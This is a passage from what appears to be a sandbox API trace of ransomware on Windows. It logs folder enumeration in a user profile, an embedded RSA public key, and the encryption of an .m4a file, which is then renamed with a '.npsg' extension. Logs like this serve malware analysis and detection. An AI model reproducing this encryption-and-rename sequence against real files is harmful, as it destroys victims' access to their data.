[0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.943] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0236.943] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.943] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.943] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.943] PathFindFileNameW (pszPath="") returned="" [0236.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0236.944] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0236.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0236.944] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0236.944] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.944] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.944] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0236.945] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.945] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.945] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.945] PathFindFileNameW (pszPath="") returned="" [0236.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0236.945] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.945] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0236.945] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0236.945] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0236.945] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0236.945] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0236.945] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0236.945] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0236.945] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0236.945] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0236.945] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0236.946] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.946] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.946] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0236.946] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.946] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.946] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.946] PathFindFileNameW (pszPath="") returned="" [0236.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0236.946] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.946] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.946] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0236.946] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.946] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.946] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.946] PathFindFileNameW (pszPath="") returned="" [0236.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa384f530, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa384f530, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0236.947] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa384f530, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa384f530, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.947] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9f5290, ftCreationTime.dwHighDateTime=0x1d5bf27, ftLastAccessTime.dwLowDateTime=0xae8be350, ftLastAccessTime.dwHighDateTime=0x1d5b5e1, ftLastWriteTime.dwLowDateTime=0xae8be350, ftLastWriteTime.dwHighDateTime=0x1d5b5e1, nFileSizeHigh=0x0, nFileSizeLow=0xf6a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B90i730v26RqNE.m4a", cAlternateFileName="B90I73~1.M4A")) returned 1 [0236.947] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B90i730v26RqNE.m4a") returned=".m4a" [0236.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B90i730v26RqNE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b90i730v26rqne.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.949] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=63138) returned 1 [0236.949] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.951] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf67c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.951] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.953] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf6a2, lpOverlapped=0x0) returned 1 [0236.953] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.954] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0236.954] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.954] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.954] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.955] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.955] GetLastError () returned 0x0 [0236.955] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.955] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0236.955] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.955] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.955] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.955] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0236.956] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf6a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.956] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0236.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0236.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.956] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.956] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.956] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.956] CloseHandle (hObject=0x644) returned 1 [0236.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b81cd0 [0236.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.958] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B90i730v26RqNE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b90i730v26rqne.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B90i730v26RqNE.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b90i730v26rqne.m4a.npsg")) returned 1 [0236.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.958] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.960] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.960] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0236.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.960] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b4ed40, 